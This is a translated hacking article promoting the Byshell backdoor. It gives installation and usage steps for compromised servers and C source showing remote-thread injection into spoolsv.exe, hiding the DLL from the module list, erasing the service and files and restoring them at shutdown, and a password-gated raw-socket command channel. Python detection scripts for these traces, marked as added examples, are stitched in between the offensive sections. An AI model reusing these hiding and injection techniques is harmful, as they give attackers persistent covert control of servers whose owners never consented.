Byshell BACKDOOR: No process, no DLL, no hard disk file

Source: Internet
Author: User

Intended readers: intrusion enthusiasts, network administrators and hacking enthusiasts

Prerequisites: basic C syntax

Liu: backdoors are an eternal topic for hackers. After the hacking of major websites such as 163, Yahoo and Peking University, more and more people are paying attention to server security, and new backdoor techniques keep appearing. Today we bring you a heavyweight backdoor, its usage and its programming method, so that newcomers have a good backdoor to play with and programming enthusiasts have a good backdoor implementation to refer to. Of course, many more new techniques are waiting for you to explore.

Byshell BACKDOOR: No process, no DLL, no hard disk file, no startup Item

Nowadays there are many popular tools in the backdoor and trojan category on the Internet, but not many of them can be called excellent. Most new users are still using software such as Radmin in place of a backdoor. Unfortunately, such tools are not real backdoors and are very easy for server administrators to detect, so it is no surprise that compromised hosts get lost all the time.

A qualified backdoor should at least not show a strange process in Task Manager; giving the backdoor process a name that looks like a system process is only self-deception. It must not leave a well-known startup key in the registry Run key or add a service entry, and certainly must not write an item into the Start Menu startup folder. It must not open a strange port that the administrator or a firewall will notice: Bits.dll has no open port while it waits for a connection, whereas a program that opens a port only during a connection has perhaps a 30% chance of surviving a port check. In addition, a backdoor should hide the files it generates, or at least avoid infecting system files whose integrity administrators routinely check. A backdoor that does not meet the first three points is not a "relatively advanced" backdoor, and it will lack stability and stealth in use.

By my classification, common backdoors fall into three levels:

★ Application level. For example WinShell, Radmin and Glacier: they basically use no techniques to hide themselves and are just ordinary applications that provide remote control.

★ System level. These make some use of Ring3 stealth programming techniques, such as Bits.dll and Portless, or a great deal of it, such as Hxdef.

TIPS: Although Hxdef ships a driver, all of its hooks are applied in Ring3, which is why we tend to call it a system-level rather than a kernel-level backdoor.

★ Kernel level. The backdoor works mainly in Ring0, so it is highly concealed and lethal. However, few kernel-level backdoors have been published, and their compatibility is unsatisfactory. Many valuable discussions and results on this topic have been published on Phrack and Rootkit.com.

In my own system-level backdoor Byshell v0.64 I tried my best to meet the requirements above. Due to my limited ability the implementation is neither complete nor fully stable, so I hope you will give me suggestions or upgrade it for me. In this article I discuss the design and implementation of this open-source backdoor with you, including practical usage examples. Please go easy on me, and let us discuss it together.

Application Example

This is a backdoor that implements no process, no DLL, no hard-disk file and no startup item. It injects a DLL into a system process with a remote thread, unlinks the DLL from the module list, deletes its own files and startup items, and restores them when the system shuts down. I learned a great deal from the ideas of Cmdbind2 and would like to express my deepest thanks to my predecessors for their selfless sharing. The software and its source code may be distributed freely, but the source must be credited when it is referenced. Modifying or stripping it for commercial purposes is not allowed; use it for learning and private purposes only, unless you contact the author and obtain consent.

Byshell 0.64 supports the following commands: cmd, shell, endshell, chpass, byver, sysinfo, pslist, pskill, modlist, get, put, reboot, dettach, popmsg, SYN, queryDOS, endDOS, refresh, etc. For detailed usage please refer to the manual.

TIPS: the refresh command is missing from the manual. It clears dead connections and gives you a chance to reconnect. It can also be used after your own IP address has changed, to clear the original connection (otherwise the new connection fails).

To install, upload ntboot.exe and ntboot.dll to the same directory on the compromised host and run "ntboot.exe -install". After installation you can delete ntboot.exe and ntboot.dll by hand and connect with by064cli.exe. Note that Byshell v0.64 does not support testing on the local machine; v0.63 does, so I will use v0.63 to demonstrate the effect:

1. Connection:

Please input the server ip address
127.0.0.1
127.0.0.1 will be connected
Input the password (the default one is 'by')
by
# Export dir c:
 The volume in drive C is not labeled.
 The serial number of the volume is CCB2-D751
 Directory of C:\
                    <DIR>          Documents and Settings
                    <DIR>          Inetpub
2004-11-17  20:56   <DIR>          Intel
                            24,576 isapilog.dll
2004-11-11                  24,576 magic_asp.dll
                    <DIR>          My Music
                               124 Operate.ini
                    <DIR>          Program Files
                    <DIR>          ubackup
                    <DIR>          WINNT
               3 files          49,276 bytes
               7 directories  124,207,104 bytes available

2. Obtain and end the shell:

# shell
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

C:\WINNT\system32>cd ..
cd ..

C:\WINNT>cd ..
cd ..

C:\>dir
dir
 The volume in drive C is not labeled.
 The serial number of the volume is CCB2-D751
 Directory of C:\
 ...... omitted
               3 files          49,276 bytes
               7 directories  124,207,104 bytes available

C:\>endshell
Shell terminated
# byver
ByShell server version 0.63
Released Dec 19,2004 Copyleft @ "by" co. ltd.

3. Process listing and kill (there are bugs: the columns are not neatly aligned).

# pslist
Process:
Pid    filename        num_thread  parentpid
8      System          43          0
184    smss.exe        6           8
208    csrss.exe       11          184
232    winlogon.exe    19          184
260    services.exe    31          232
272    lsass.exe       17          232
456    svchost.exe     11          260
488    SPOOLSV.EXE     14          260
524    msdtc.exe       21          260
636    svchost.exe     18          260
656    llssrv.exe      9           260
688    sqlservr.exe    28          260
776    winmgmt.exe     3           260
812    dfssvc.exe      2           260
832    inetinfo.exe    29          260
856    mssearch.exe    6           260
1224   svchost.exe     11          260
1176   explorer.exe    19          1172
1356   igfxtray.exe    2           1176
1404   PFWMain.exe     4           1176
1412   SOUNDMAN.EXE    2           1176
1428   realsched.exe   4           1176
1436   internat.exe    1           1176
1444   sqlmangr.exe    3           1176
1280   BitComet.exe    9           1176
328    notepad.exe     2           1176
1196   MDM.EXE         5           456
1512   conime.exe      1           1088
1520   cmd.exe         1           488
1504   by063cli.exe    1           1176
# pskill 1428
OK, job was done, cuz we have localsystem & SE_DEBUG_NAME :)
# modlist 1520
Mods' of 1520:
Module_id  module_name    module_path
1          ntdll.dll      C:\WINNT\System32\ntdll.dll
1          KERNEL32.dll   C:\WINNT\system32\KERNEL32.dll
1          USER32.dll     C:\WINNT\system32\USER32.dll
1          GDI32.DLL      C:\WINNT\system32\GDI32.DLL
1          ADVAPI32.dll   C:\WINNT\system32\ADVAPI32.dll
1          RPCRT4.DLL     C:\WINNT\system32\RPCRT4.DLL
1          MSVCRT.dll     C:\WINNT\system32\MSVCRT.dll
1          IMM32.DLL      C:\WINNT\System32\IMM32.DLL
#

Now let me introduce the three most common functions. In many cases these three are the most basic and the hardest to keep stable, but the most prominent feature of this backdoor is its implementation of no process, no DLL, no hard-disk file and no startup item. I believe you will find its advantages in actual use; the following describes how these features are implemented from the perspective of design and programming.

Design & Programming

In this section I will not list the complete code because it is too long; I will quote the key code to illustrate the ideas behind it.

First, how do we hide our process? A common method is remote thread injection. Its biggest problem is that once the code is injected into the address space of the remote process, every directly addressed instruction that depended on the original address space must be relocated. Assembly veterans understand this easily; for high-level-language programmers it means that every explicit and implicit global variable (such as API addresses and strings) must be relocated by hand.

Compared with virus writers we are lucky, because our injector can inject a "global variable block" into the remote process at the same time and then pass the address of this block to the remote function, which uses it in place of directly addressed global variables. This avoids writing fully "self-relocating" code, which is considered very cumbersome and almost impossible in a high-level language. Even so, writing relocatable code remains quite complex, and a backdoor with many functional modules becomes very tiring to write. Farmer's Cmdbind2 implements an injected backdoor with fully manual relocation; his source code shows that he spent a lot of code just implementing the most common bind shell. A backdoor as full-featured as ByShell v0.64 written that way is hard to imagine.

Rather than writing relocated code directly, the common method is to load a DLL from the function injected into the remote process; the system then does the relocation for you, and the main functionality of the backdoor lives in the DLL. Shan Changhong introduced this method in an earlier issue, for example. It has a small drawback: while reviewing the injected process, the administrator will find an unknown DLL, which exposes the backdoor. Farmer proposed the following idea: first load the DLL, then copy its whole image elsewhere in memory, unload the DLL, allocate memory at the same address where the DLL was loaded, and copy the saved image back into that space. We can then call the DLL directly, all relocation problems are solved, and our DLL no longer appears in the injected process's list of loaded modules. Farmer did not implement his idea in code; below I give the main code of my implementation of it.

During the comparison we will also discuss other system-level process-hiding methods. Bingle loads the backdoor by replacing a DLL service started by svchost; ZXshell uses this method too. The main problem with this approach is instability: sensitive registry keys are changed, and an unknown module appears in the module list of svchost.exe. Replacing an original DLL with a trojan DLL of the same name avoids these problems but raises a new one: how to bypass Windows File Protection and the administrator's routine integrity checks of system files.

Hxdef hooks the Ring3 API (the native API of ntdll.dll) to hide all of its traces. This works well against ordinary Ring3 checks and can partially implement port multiplexing. The main problems are that there are not many hooking methods available in Ring3 and the effect is not very good, because the approach is rather "active" (Hxdef injects its trojan data into every process in the system) and is easily found by a Ring0 rootkit detector such as IceSword. Finally, the programming is cumbersome.

See the code:

void injcode()
{
    HANDLE prohandle;        // handle of the target (injection) process
    DWORD pid = 0;           // PID of the target process
    int ret;                 // temporary variable

    // Use the ToolHelp32 functions to find the PID of the target process
    Sleep(1000);
    HANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    PROCESSENTRY32 processsnap;
    processsnap.dwSize = sizeof(PROCESSENTRY32);
    char injexe[] = "spoolsv.exe";   // target process; change it as you like
    for (Process32First(snapshot, &processsnap); Process32Next(snapshot, &processsnap);) {
        /* loop body elided in the original; this is where pid is set */
    }
    CloseHandle(snapshot);   // PID obtained

    // Obtain the SE_DEBUG_NAME privilege
    HANDLE hToken;
    OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES, &hToken);
    TOKEN_PRIVILEGES tp;
    tp.PrivilegeCount = 1;
    LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &tp.Privileges[0].Luid);
    tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
    AdjustTokenPrivileges(hToken, 0, &tp, sizeof(tp), 0, 0);

    // Inject now
    prohandle = OpenProcess(PROCESS_ALL_ACCESS, 1, pid);
    DWORD WINAPI injfunc(LPVOID);   // injfunc is the injected function; it must be relocated by hand

    // Obtain the needed API addresses and write them into the global variable block that
    // will be injected. injapistr is a global INJAPISTR structure holding that block.
    HMODULE hModule;
    LPVOID paramaddr;   // address of the global variable block in the target process
    hModule = LoadLibrary("kernel32.dll");
    injapistr.myLoadLibrary    = (HINSTANCE (__stdcall *)(const char *))GetProcAddress(hModule, "LoadLibraryA");
    injapistr.myGetProcAddress = (FARPROC (__stdcall *)(HMODULE, LPCTSTR))GetProcAddress(hModule, "GetProcAddress");
    injapistr.myVirtualAlloc   = (void *(__stdcall *)(void *, unsigned long, unsigned long, unsigned long))GetProcAddress(hModule, "VirtualAlloc");
    injapistr.myFreeLibrary    = (int (__stdcall *)(HINSTANCE))GetProcAddress(hModule, "FreeLibrary");
    injapistr.myIsBadReadPtr   = (int (__stdcall *)(const void *, unsigned int))GetProcAddress(hModule, "IsBadReadPtr");
    injapistr.myVirtualFree    = (int (__stdcall *)(void *, unsigned long, unsigned long))GetProcAddress(hModule, "VirtualFree");

    // Allocate the global variable block in the target process and write the API addresses into it
    paramaddr = VirtualAllocEx(prohandle, 0, sizeof(injapistr), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    ret = WriteProcessMemory(prohandle, paramaddr, &injapistr, sizeof(injapistr), 0);

    // Write the injfunc function into the target process
    void *injfuncaddr = VirtualAllocEx(prohandle, 0, 20000, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    ret = WriteProcessMemory(prohandle, injfuncaddr, injfunc, 20000, 0);

    // Start the remote thread
    CreateRemoteThread(prohandle, 0, 0, (LPTHREAD_START_ROUTINE)injfuncaddr, paramaddr, 0, 0);
    CloseHandle(prohandle);
    return;
}

// The injected function: it does the hard work of loading and then unlinking the trojan DLL
DWORD WINAPI injfunc(LPVOID paramaddr)
{
    // paramaddr is the base address of the global variable block. Every static global
    // variable (directly addressed) needs relocation; dynamically allocated memory (heap,
    // VirtualAlloc) and stack variables do not, because they are addressed indirectly.
    // The strings could have been placed in the global variable block as well, but there
    // are only two, so they are built on the stack with inline asm instead.
    char ntboot[16];
    char msgbox[16];   // badly named: it holds the name of the DLL backdoor's main function
    INJAPISTR *pinjapistr = (INJAPISTR *)paramaddr;
    __asm {
        mov ntboot, 'n'
        mov ntboot + 1, 'T'
        mov ntboot + 2, 'B'
        mov ntboot + 3, 'O'
        mov ntboot + 4, 'O'
        mov ntboot + 5, 'T'
        mov ntboot + 6, '.'
        mov ntboot + 7, 'd'
        mov ntboot + 8, 'l'
        mov ntboot + 9, 'l'
        mov ntboot + 10, 0
        mov msgbox, 'C'
        mov msgbox + 1, 'M'
        mov msgbox + 2, 'D'
        mov msgbox + 3, 's'
        mov msgbox + 4, 'E'
        mov msgbox + 5, 'R'
        mov msgbox + 6, 'V'
        mov msgbox + 7, 'I'
        mov msgbox + 8, 'C'
        mov msgbox + 9, 'E'
        mov msgbox + 10, 0
    }
    HMODULE hModule = pinjapistr->myLoadLibrary(ntboot);   // load ntboot.dll
    DWORD (WINAPI *mydomainservice)(LPVOID);                // main function of the DLL backdoor
    mydomainservice = (DWORD (WINAPI *)(LPVOID))(pinjapistr->myGetProcAddress(hModule, msgbox));

    // Now the unlinking trick:
    unsigned int memsize = 0;
    void *tempdll = pinjapistr->myVirtualAlloc(0, 0x23000, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    memcpy(tempdll, hModule, 0x23000);
    // 0x23000 is the size of the DLL image; adjust it if the size of ntboot.dll changes
    pinjapistr->myFreeLibrary(hModule);
    hModule = (HMODULE)pinjapistr->myVirtualAlloc(hModule, 0x23000, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    memcpy(hModule, tempdll, 0x23000);
    pinjapistr->myVirtualFree(tempdll, 0x23000, MEM_DECOMMIT);
    // Done: the DLL is no longer loaded, yet it can still be called. Refreshing, isn't it?
    mydomainservice(0);   // call the backdoor's main function
    return 0;
}
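A defender's counterpart to the unlinking trick above, as an added example that is not part of the original article or of Byshell: after FreeLibrary and the copy back into a fresh VirtualAlloc region, the image is gone from the module list, but the copy was taken from the module base, so the DOS and PE headers still sit in a private executable region at the old address. A memory scanner (the IceSword mentioned later does this kind of check) walks the address space and flags executable regions that carry a PE header but match no loaded module. The Python below performs that comparison on a constructed snapshot; the module list, region list and PE bytes are all invented for the example. On a live Windows host the same inputs would come from EnumProcessModules, VirtualQueryEx and ReadProcessMemory.

```python
import struct

DOS_MAGIC = b"MZ"
PE_MAGIC = b"PE\0\0"
IMAGE_FILE_DLL = 0x2000          # Characteristics flag set on DLL images


def make_pe_image(is_dll=True, e_lfanew=0x80, total=0x200):
    """Build a minimal, non-loadable PE header as constructed test input."""
    hdr = bytearray(total)
    hdr[0:2] = DOS_MAGIC
    struct.pack_into("<I", hdr, 0x3C, e_lfanew)          # e_lfanew -> NT headers
    hdr[e_lfanew:e_lfanew + 4] = PE_MAGIC
    # IMAGE_FILE_HEADER: Machine, NumberOfSections, TimeDateStamp,
    # PointerToSymbolTable, NumberOfSymbols, SizeOfOptionalHeader, Characteristics
    chars = 0x0102 | (IMAGE_FILE_DLL if is_dll else 0)
    struct.pack_into("<HHIIIHH", hdr, e_lfanew + 4, 0x014C, 2, 0, 0, 0, 0xE0, chars)
    return bytes(hdr)


def parse_pe_header(data):
    """Return (is_dll, characteristics) when data starts with a sane PE header, else None."""
    if len(data) < 0x40 or data[:2] != DOS_MAGIC:
        return None
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    # Bound e_lfanew so a truncated or hostile region cannot push the read off the buffer
    if e_lfanew + 24 > len(data) or data[e_lfanew:e_lfanew + 4] != PE_MAGIC:
        return None
    chars = struct.unpack_from("<HHIIIHH", data, e_lfanew + 4)[6]
    return bool(chars & IMAGE_FILE_DLL), chars


def find_unlinked_images(regions, modules):
    """Flag executable regions that carry a PE header but match no listed module base."""
    known_bases = set(modules.values())
    findings = []
    for r in regions:
        if not r["executable"] or r["base"] in known_bases:
            continue
        parsed = parse_pe_header(r["data"])
        if parsed is None:
            continue
        findings.append({"base": r["base"], "size": r["size"],
                         "is_dll": parsed[0], "private": r["private"]})
    return findings


# Constructed snapshot: what a module list would show, plus the executable regions found
# by walking the address space. Bases and sizes are invented for the example.
SAMPLE_MODULES = {"ntdll.dll": 0x77F80000, "KERNEL32.dll": 0x7C800000}
SAMPLE_REGIONS = [
    {"base": 0x77F80000, "size": 0x7C000, "executable": True, "private": False,
     "data": make_pe_image()},                       # legitimately mapped ntdll
    {"base": 0x10000000, "size": 0x23000, "executable": True, "private": True,
     "data": make_pe_image()},                       # copied-back image: PE header, no module entry
    {"base": 0x00350000, "size": 0x1000, "executable": True, "private": True,
     "data": b"\x55\x8b\xec" + b"\x90" * 0x100},     # plain code without a PE header
    {"base": 0x00360000, "size": 0x40, "executable": True, "private": True,
     "data": b"MZ" + b"\0" * 0x3A + struct.pack("<I", 0x100000)},  # MZ with e_lfanew out of range
]


def scan_sample():
    return find_unlinked_images(SAMPLE_REGIONS, SAMPLE_MODULES)


if __name__ == "__main__":
    for f in scan_sample():
        print(f"PE image at {f['base']:#010x} ({f['size']:#x} bytes) is not in the module list; "
              f"private={f['private']} dll={f['is_dll']}")
```

The third region stands in for the raw function buffer that the injector writes: it is private and executable too, but carries no PE header, so this particular rule stays quiet about it and a hunt for it needs a different heuristic (private executable memory with no backing file at all). The fourth region shows why the e_lfanew bound matters: an "MZ" prefix with a pointer past the end of the region is dropped rather than crashing the scanner.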

The next problem is the startup item and the file. Ntboot.exe is the backdoor's injector and starts itself as a service, but we must not let the administrator discover the service key. What to do? Here is another idea from Farmer: first delete all backdoor files and the service entry, then register a shutdown notification and a one-key shutdown hook, and write the files and service entries back when the system is about to shut down. Likewise, as soon as the service starts it deletes them again. This achieves no file and no startup item: the administrator cannot spot an anomaly or find our backdoor file by comparing against the registry. Let's look at the code that sets up the shutdown notification and the one-key shutdown hook:

HHOOK msghook;   // global hook handle (its declaration is not shown on the page; assumed here)
BOOL WINAPI HandlerRoutine(DWORD dwCtrlType);

DWORD WINAPI hookthread(LPVOID lpParam)
{
    MSG msg;
    int tmpret;
    char tmpstr[100];
    LRESULT CALLBACK JournalRecordProc(int code, WPARAM wParam, LPARAM lParam);

    msghook = SetWindowsHookEx(WH_JOURNALRECORD, JournalRecordProc, GetModuleHandle(0), 0);
    if (!msghook) {
        /* error handling elided in the original */
    }
    tmpret = SetConsoleCtrlHandler(HandlerRoutine, 1);
    if (!tmpret) {
        /* error handling elided in the original */
    }
    while (GetMessage(&msg, NULL, 0, 0)) {
        void resume();
        if (msg.message == WM_QUERYENDSESSION) {
            /* body elided in the original */
        }
    }
    UnhookWindowsHookEx(msghook);
    return 0;
}

BOOL WINAPI HandlerRoutine(DWORD dwCtrlType)
{
    void resume();
    switch (dwCtrlType) {
    case CTRL_SHUTDOWN_EVENT:
        resume();   // resume(), as its name says, restores the file and the startup item
        break;
    default:
        break;
    }
    return 0;
}

LRESULT CALLBACK JournalRecordProc(int code, WPARAM wParam, LPARAM lParam)
{
    void resume();
    if (code < 0) {
        return CallNextHookEx(msghook, code, wParam, lParam);
    }
    if (code == HC_ACTION) {
        EVENTMSG *pevent = (EVENTMSG *)lParam;
        if (pevent->message == WM_KEYDOWN && LOBYTE(pevent->paramL) == 0xFF) {
            /* body elided in the original */
        }
    }
    return CallNextHookEx(msghook, code, wParam, lParam);
}

Compared with Hxdef hooking the native file and registry APIs, the advantage of this method is that there is no file at all, so no Ring0 rootkit detector can find files or registry entries that a hooked API is hiding. The disadvantage is that if the other side pulls the plug, we "rest in peace". So we console ourselves: this backdoor is concealed enough that the other side will not suspect it is there and resort to brutal means like cutting the power. If instead you use Hxdef, believe me, rootkit detectors are very common today, Hxdef is everyone's target, and it will "rest in peace" at the administrator's next inspection.
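From the defender's side, the shutdown-time trick described above has a footprint that survives in the event log even though the file and the service key do not: the service is re-registered in the last seconds before shutdown and deleted again right after boot. The following Python is an added example, not from the article or from Byshell, of a log-correlation rule for that pattern, run over constructed Windows System-log records. The event IDs are real (7045: a service was installed; 1074: a process initiated shutdown; 6006: the Event Log service stopped); the timestamps, the service name "ntboot", the image paths and the post-boot service inventory are all made up for the example.

```python
from datetime import datetime, timedelta

EVT_SERVICE_INSTALLED = 7045   # Service Control Manager: a service was installed
EVT_SHUTDOWN_INITIATED = 1074  # User32: a process initiated a shutdown/restart
EVT_EVENTLOG_STOPPED = 6006    # Event Log service stopped: clean-shutdown marker


def parse_events(rows):
    """rows: (timestamp string, event id, details dict) -> sorted (datetime, id, details)."""
    parsed = [(datetime.strptime(t, "%Y-%m-%d %H:%M:%S"), eid, d) for t, eid, d in rows]
    return sorted(parsed, key=lambda e: e[0])


def services_installed_at_shutdown(rows, window=timedelta(seconds=120)):
    """Return every 7045 that falls within `window` of a shutdown marker (1074 or 6006)."""
    events = parse_events(rows)
    markers = [t for t, eid, _ in events
               if eid in (EVT_SHUTDOWN_INITIATED, EVT_EVENTLOG_STOPPED)]
    alerts = []
    for t, eid, d in events:
        if eid != EVT_SERVICE_INSTALLED:
            continue
        near = [m for m in markers if abs(m - t) <= window]
        if near:
            alerts.append({"service": d.get("ServiceName"), "image": d.get("ImagePath"),
                           "installed_at": t,
                           "shutdown_at": min(near, key=lambda m: abs(m - t))})
    return alerts


def vanished_after_boot(alerts, current_services):
    """Second signal: a service installed at shutdown that no longer exists after boot."""
    return [a for a in alerts if a["service"] not in current_services]


# Constructed sample log (not real records). The 7045 at 17:59:33 lands between the
# shutdown-initiated and event-log-stopped markers: a service registered during shutdown.
SAMPLE_EVENTS = [
    ("2004-12-19 09:00:05", 7045, {"ServiceName": "Spooler",
                                   "ImagePath": r"C:\WINNT\system32\spoolsv.exe"}),
    ("2004-12-19 17:59:31", 1074, {"Process": "winlogon.exe", "Reason": "shutdown"}),
    ("2004-12-19 17:59:33", 7045, {"ServiceName": "ntboot",
                                   "ImagePath": r"C:\WINNT\system32\ntboot.exe"}),
    ("2004-12-19 17:59:40", 6006, {}),
    ("2004-12-20 08:30:00", 7045, {"ServiceName": "ExampleUpdater",
                                   "ImagePath": r"C:\Program Files\Example\upd.exe"}),
]
# Services enumerated after the next boot (constructed): the shutdown-time one is gone again
SAMPLE_SERVICES_AFTER_BOOT = {"Spooler", "ExampleUpdater", "Eventlog", "lanmanserver"}


def run_sample():
    alerts = services_installed_at_shutdown(SAMPLE_EVENTS)
    return alerts, vanished_after_boot(alerts, SAMPLE_SERVICES_AFTER_BOOT)


if __name__ == "__main__":
    alerts, vanished = run_sample()
    for a in alerts:
        gap = abs((a["shutdown_at"] - a["installed_at"]).total_seconds())
        print(f"service '{a['service']}' ({a['image']}) installed at {a['installed_at']}, "
              f"{gap:.0f}s from a shutdown marker")
    for a in vanished:
        print(f"service '{a['service']}' is absent after boot: install-at-shutdown, delete-at-start")
```

The window is deliberately short: a service installed two seconds after winlogon initiated shutdown is exactly what a shutdown-notification handler produces, while a legitimate installer is very unlikely to run in that gap. The second check turns a "suspicious" hit into a strong one, because a service that appears at every shutdown and is missing at every inspection has no benign explanation.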

The last step is how to implement no port (hiding the port with a rootkit does not count as no port). This is a weakness of Byshell v0.64. Port reuse is difficult in Ring3: you can only use raw sockets to listen for TCP the way Bits.dll does, giving "no port while waiting for a connection", or load yourself as an SPI base service provider or layered service provider and intercept all Ring3 network traffic, but that leaves enough traces in the registry and the system to make our backdoor "rest in peace". Although Hxdef's hooking of recv/WSARecv in every process cannot reuse ports held in Ring0, such as 139 and 445, it still seems the better Ring3 port-multiplexing method. For now Byshell uses a custom raw-socket protocol, that is, a protocol that is neither TCP nor UDP, which gets through most software firewalls and some hardware firewalls. The disadvantages are that it does not get through every firewall and that it does not work on Windows XP SP2, which removed raw-socket support. My implementation is simple: IP protocol number 224 is used to listen for connections and refreshes, and protocol number 225 to transmit the backdoor data:

WSADATA WSAData;
WSAStartup(MAKEWORD(2, 2), &WSAData);
SOCKET sock224 = socket(AF_INET, SOCK_RAW, 224);
sockaddr_in srvaddr;
memset(&srvaddr, 0, sizeof(struct sockaddr_in));
srvaddr.sin_family = AF_INET;
srvaddr.sin_addr.S_un.S_addr = INADDR_ANY;
ret = bind(sock224, (struct sockaddr *)&srvaddr, sizeof(struct sockaddr));
if (ret) { goto label2; }
dwThreadId = 0;
char buffcycle[128];
DWORD WINAPI threadfunc(LPVOID lpParam);
HANDLE thrdhndl;
// Create the thread that handles the protocol 225 connection
thrdhndl = CreateThread(0, 0, threadfunc, 0, 0, &dwThreadId);
// Wait for a refresh
while (1) {
    recvfrom(sock224, buffcycle, sizeof(buffcycle), 0, 0, 0);
    // A raw socket delivers the IP header first, then the password, then the magic string
    if (!strncmp(buffcycle + 32 + sizeof(IP_HEADER), "+_)(*&^%$#@!~byrefreshbreak", 27)
        && !strncmp(buffcycle + sizeof(IP_HEADER), pwd, strlen(pwd))) {
        TerminateThread(thrdhndl, 0);
        goto label1;
    }
}

In the code for protocol 225 I implemented simple error control; it is long, so I do not list it here. If you are interested, see the source code. This reuse method is not very reliable or stable, which is why I also published Byshell v0.63: it simply opens TCP port 138, which does not meet the requirements of a backdoor at all but is fine for testing. If you find Byshell v0.64 unstable, try v0.63. A serious mistake is that in Byshell v0.64 I left the command "refresh" out of the manual; it clears the 225 connection and gives you a chance to reconnect.
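On the network side, the custom protocol numbers are the most visible thing about this channel: a server that normally speaks TCP, UDP and ICMP suddenly sending or receiving IP protocol 224 or 225 datagrams stands out in any capture. The Python below is an added example, not from the article or from Byshell, of the triage a sensor or a pcap script would do: parse the IPv4 header of each packet, allowlist the protocols the host is expected to carry, and flag everything else, reporting malformed headers (a short packet, or an IHL below 5) instead of silently skipping them. The packets are constructed inline with a small builder; the allowlist is an assumption to tune per host, and the addresses are invented.

```python
import struct

# Protocols a typical server interface is expected to carry (assumed allowlist; tune per host)
EXPECTED_PROTOCOLS = {1: "ICMP", 2: "IGMP", 6: "TCP", 17: "UDP", 47: "GRE", 50: "ESP", 51: "AH"}


def _ip(addr):
    return bytes(int(o) for o in addr.split("."))


def build_ipv4(src, dst, proto, payload=b"", ihl=5):
    """Build a raw IPv4 packet as constructed test input (header checksum left as 0)."""
    header = struct.pack("!BBHHHBBH4s4s",
                         (4 << 4) | ihl, 0, 20 + len(payload), 0x1234, 0, 64, proto, 0,
                         _ip(src), _ip(dst))
    return header + payload


def parse_ipv4(pkt):
    """Return the fields a triage rule needs, or None when the header is malformed."""
    if len(pkt) < 20:
        return None                                   # shorter than a minimal header
    version, ihl = pkt[0] >> 4, pkt[0] & 0x0F
    if version != 4 or ihl < 5 or len(pkt) < ihl * 4:
        return None                                   # bogus IHL or options cut off
    total_len = struct.unpack_from("!H", pkt, 2)[0]
    return {"proto": pkt[9],
            "src": ".".join(str(b) for b in pkt[12:16]),
            "dst": ".".join(str(b) for b in pkt[16:20]),
            "payload": pkt[ihl * 4:total_len]}


def triage(packets, allow=EXPECTED_PROTOCOLS):
    """One finding per packet that is malformed or uses a protocol outside the allowlist."""
    findings = []
    for idx, pkt in enumerate(packets):
        fields = parse_ipv4(pkt)
        if fields is None:
            findings.append({"index": idx, "reason": "malformed", "proto": None})
        elif fields["proto"] not in allow:
            findings.append({"index": idx, "reason": "unexpected-protocol",
                             "proto": fields["proto"],
                             "src": fields["src"], "dst": fields["dst"]})
    return findings


# Constructed capture: two ordinary packets, two datagrams with the protocol numbers the
# article uses (224 and 225), and one packet with a bogus header length.
SAMPLE_CAPTURE = [
    build_ipv4("10.0.0.5", "10.0.0.9", 6, b"\x00\x50" * 4),
    build_ipv4("10.0.0.5", "10.0.0.9", 17, b"\x00\x35"),
    build_ipv4("198.51.100.7", "10.0.0.9", 224, b"x" * 64),
    build_ipv4("10.0.0.9", "198.51.100.7", 225, b"y" * 32),
    build_ipv4("10.0.0.5", "10.0.0.9", 6, b"", ihl=3),
]


def triage_sample():
    return triage(SAMPLE_CAPTURE)


if __name__ == "__main__":
    for f in triage_sample():
        print(f)
```

Because the rule keys on the protocol byte rather than on a payload signature, it also catches the next custom protocol number an operator picks; the tuning cost is a one-time survey of which protocols the host legitimately uses (the allowlist above is a starting point, not a universal answer). A host-side check complements it on the Windows 2000/XP systems the article targets: a raw-socket listener shows up as a socket with no TCP or UDP port, which is the absence the article is counting on an administrator not to look for.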

Finally, Byshell implements many commands within the backdoor connection, such as viewing system information, executing commands, uploading and downloading files, and even SYN flooding. The backdoor's functionality lives in the Work() function, which makes extension and modular programming easy. I will keep improving the port-reuse part; in the future it may become Ring3 reuse like Hxdef's, or something like a Ring0 filter driver. I also hope my predecessors will keep guiding me.

My coding style is not good: I dislike both branching and compact code. I still hope you will develop this software together with me. Three people helped me a lot while writing this backdoor, and please allow me some space to thank them: gxisone, Glacier, and of course Farmer. This backdoor is to their credit.

If you have questions or want to get in touch, please mail baiyuanfan@163.com. Thank you for your attention to and support for ByShell and me.
